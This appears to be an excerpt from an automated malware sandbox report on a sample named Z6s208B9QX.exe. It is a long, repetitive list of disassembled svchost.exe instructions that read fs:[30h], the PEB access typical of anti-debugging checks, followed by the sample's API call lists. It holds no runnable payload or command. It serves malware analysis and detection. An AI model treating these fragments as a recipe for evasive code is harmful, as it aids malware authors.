            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE10E mov eax, dword ptr fs:[00000030h]8_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE10E mov ecx, dword ptr fs:[00000030h]8_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE10E mov eax, dword ptr fs:[00000030h]8_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE10E mov ecx, dword ptr fs:[00000030h]8_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037601F8 mov eax, dword ptr fs:[00000030h]8_2_037601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE1D0 mov eax, dword ptr fs:[00000030h]8_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE1D0 mov eax, dword ptr fs:[00000030h]8_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]8_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE1D0 mov eax, dword ptr fs:[00000030h]8_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE1D0 mov eax, dword ptr fs:[00000030h]8_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F61C3 mov eax, dword ptr fs:[00000030h]8_2_037F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F61C3 mov eax, dword ptr fs:[00000030h]8_2_037F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B019F mov eax, dword ptr fs:[00000030h]8_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B019F mov eax, dword ptr fs:[00000030h]8_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B019F mov eax, dword ptr fs:[00000030h]8_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B019F mov eax, dword ptr fs:[00000030h]8_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372A197 mov eax, dword ptr fs:[00000030h]8_2_0372A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372A197 mov eax, dword ptr fs:[00000030h]8_2_0372A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372A197 mov eax, dword ptr fs:[00000030h]8_2_0372A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03770185 mov eax, dword ptr fs:[00000030h]8_2_03770185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037EC188 mov eax, dword ptr fs:[00000030h]8_2_037EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037EC188 mov eax, dword ptr fs:[00000030h]8_2_037EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D4180 mov eax, dword ptr fs:[00000030h]8_2_037D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D4180 mov eax, dword ptr fs:[00000030h]8_2_037D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375C073 mov eax, dword ptr fs:[00000030h]8_2_0375C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03732050 mov eax, dword ptr fs:[00000030h]8_2_03732050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B6050 mov eax, dword ptr fs:[00000030h]8_2_037B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C6030 mov eax, dword ptr fs:[00000030h]8_2_037C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372A020 mov eax, dword ptr fs:[00000030h]8_2_0372A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372C020 mov eax, dword ptr fs:[00000030h]8_2_0372C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0374E016 mov eax, dword ptr fs:[00000030h]8_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0374E016 mov eax, dword ptr fs:[00000030h]8_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0374E016 mov eax, dword ptr fs:[00000030h]8_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0374E016 mov eax, dword ptr fs:[00000030h]8_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B4000 mov ecx, dword ptr fs:[00000030h]8_2_037B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D2000 mov eax, dword ptr fs:[00000030h]8_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D2000 mov eax, dword ptr fs:[00000030h]8_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D2000 mov eax, dword ptr fs:[00000030h]8_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D2000 mov eax, dword ptr fs:[00000030h]8_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D2000 mov eax, dword ptr fs:[00000030h]8_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D2000 mov eax, dword ptr fs:[00000030h]8_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D2000 mov eax, dword ptr fs:[00000030h]8_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D2000 mov eax, dword ptr fs:[00000030h]8_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372C0F0 mov eax, dword ptr fs:[00000030h]8_2_0372C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037720F0 mov ecx, dword ptr fs:[00000030h]8_2_037720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]8_2_0372A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037380E9 mov eax, dword ptr fs:[00000030h]8_2_037380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B60E0 mov eax, dword ptr fs:[00000030h]8_2_037B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B20DE mov eax, dword ptr fs:[00000030h]8_2_037B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F60B8 mov eax, dword ptr fs:[00000030h]8_2_037F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F60B8 mov ecx, dword ptr fs:[00000030h]8_2_037F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C80A8 mov eax, dword ptr fs:[00000030h]8_2_037C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373208A mov eax, dword ptr fs:[00000030h]8_2_0373208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03738770 mov eax, dword ptr fs:[00000030h]8_2_03738770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740770 mov eax, dword ptr fs:[00000030h]8_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03730750 mov eax, dword ptr fs:[00000030h]8_2_03730750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037BE75D mov eax, dword ptr fs:[00000030h]8_2_037BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772750 mov eax, dword ptr fs:[00000030h]8_2_03772750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772750 mov eax, dword ptr fs:[00000030h]8_2_03772750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B4755 mov eax, dword ptr fs:[00000030h]8_2_037B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376674D mov esi, dword ptr fs:[00000030h]8_2_0376674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376674D mov eax, dword ptr fs:[00000030h]8_2_0376674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376674D mov eax, dword ptr fs:[00000030h]8_2_0376674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376273C mov eax, dword ptr fs:[00000030h]8_2_0376273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376273C mov ecx, dword ptr fs:[00000030h]8_2_0376273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376273C mov eax, dword ptr fs:[00000030h]8_2_0376273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AC730 mov eax, dword ptr fs:[00000030h]8_2_037AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376C720 mov eax, dword ptr fs:[00000030h]8_2_0376C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376C720 mov eax, dword ptr fs:[00000030h]8_2_0376C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03730710 mov eax, dword ptr fs:[00000030h]8_2_03730710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03760710 mov eax, dword ptr fs:[00000030h]8_2_03760710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376C700 mov eax, dword ptr fs:[00000030h]8_2_0376C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037347FB mov eax, dword ptr fs:[00000030h]8_2_037347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037347FB mov eax, dword ptr fs:[00000030h]8_2_037347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037527ED mov eax, dword ptr fs:[00000030h]8_2_037527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037527ED mov eax, dword ptr fs:[00000030h]8_2_037527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037527ED mov eax, dword ptr fs:[00000030h]8_2_037527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037BE7E1 mov eax, dword ptr fs:[00000030h]8_2_037BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373C7C0 mov eax, dword ptr fs:[00000030h]8_2_0373C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B07C3 mov eax, dword ptr fs:[00000030h]8_2_037B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037307AF mov eax, dword ptr fs:[00000030h]8_2_037307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E47A0 mov eax, dword ptr fs:[00000030h]8_2_037E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D678E mov eax, dword ptr fs:[00000030h]8_2_037D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03762674 mov eax, dword ptr fs:[00000030h]8_2_03762674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F866E mov eax, dword ptr fs:[00000030h]8_2_037F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F866E mov eax, dword ptr fs:[00000030h]8_2_037F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376A660 mov eax, dword ptr fs:[00000030h]8_2_0376A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376A660 mov eax, dword ptr fs:[00000030h]8_2_0376A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0374C640 mov eax, dword ptr fs:[00000030h]8_2_0374C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0374E627 mov eax, dword ptr fs:[00000030h]8_2_0374E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03766620 mov eax, dword ptr fs:[00000030h]8_2_03766620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03768620 mov eax, dword ptr fs:[00000030h]8_2_03768620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373262C mov eax, dword ptr fs:[00000030h]8_2_0373262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772619 mov eax, dword ptr fs:[00000030h]8_2_03772619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE609 mov eax, dword ptr fs:[00000030h]8_2_037AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE6F2 mov eax, dword ptr fs:[00000030h]8_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE6F2 mov eax, dword ptr fs:[00000030h]8_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE6F2 mov eax, dword ptr fs:[00000030h]8_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE6F2 mov eax, dword ptr fs:[00000030h]8_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B06F1 mov eax, dword ptr fs:[00000030h]8_2_037B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B06F1 mov eax, dword ptr fs:[00000030h]8_2_037B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]8_2_0376A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376A6C7 mov eax, dword ptr fs:[00000030h]8_2_0376A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037666B0 mov eax, dword ptr fs:[00000030h]8_2_037666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376C6A6 mov eax, dword ptr fs:[00000030h]8_2_0376C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03734690 mov eax, dword ptr fs:[00000030h]8_2_03734690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03734690 mov eax, dword ptr fs:[00000030h]8_2_03734690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376656A mov eax, dword ptr fs:[00000030h]8_2_0376656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376656A mov eax, dword ptr fs:[00000030h]8_2_0376656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376656A mov eax, dword ptr fs:[00000030h]8_2_0376656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03738550 mov eax, dword ptr fs:[00000030h]8_2_03738550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03738550 mov eax, dword ptr fs:[00000030h]8_2_03738550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740535 mov eax, dword ptr fs:[00000030h]8_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740535 mov eax, dword ptr fs:[00000030h]8_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740535 mov eax, dword ptr fs:[00000030h]8_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740535 mov eax, dword ptr fs:[00000030h]8_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740535 mov eax, dword ptr fs:[00000030h]8_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740535 mov eax, dword ptr fs:[00000030h]8_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0375E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037C6500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03804500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037325E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0376C5ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037365D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0376A5D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0376E5CF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037545B1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037B05A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0376E59C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03732582 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03732582 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03764588 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0375A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037BC460 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0372645D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0375245A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0376E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0376A430 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0372E420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0372C427 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03768402 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037304E5 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037644B0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037BA4B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037364AB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0372CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037DEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037E4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037C6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037FAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037D8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0375EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037F8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03738BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0375EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037BCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037DEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03750BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03730BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03740BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037E4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03804A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037ACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0376CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037DEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03736A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03740A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03754A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0376CA38 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0376CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0375EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037BCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0376AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03730AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03764AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03786ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03738AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03786AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03768A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0373EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037BC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03756962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0377096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0377096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037B0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037B892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037C892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037BC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03728918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037BE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037FA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037C69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037B89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037BE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037C6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03760854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03734859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03742840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03752835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03752835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0376A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037D483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037BC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0376C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037FA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0375E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037BC89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03730887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0375AF69 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037D2F60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0372CF50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0376CF50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037D0F50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_037B4F40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe Code function: 0_2_004238DA __lseeki64_nolock, __lseeki64_nolock, GetProcessHeap, HeapAlloc, __setmode_nolock, __write_nolock, __setmode_nolock, GetProcessHeap, HeapFree, __lseeki64_nolock, SetEndOfFile, GetLastError, __lseeki64_nolock
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe Code function: 0_2_0041F250 SetUnhandledExceptionFilter
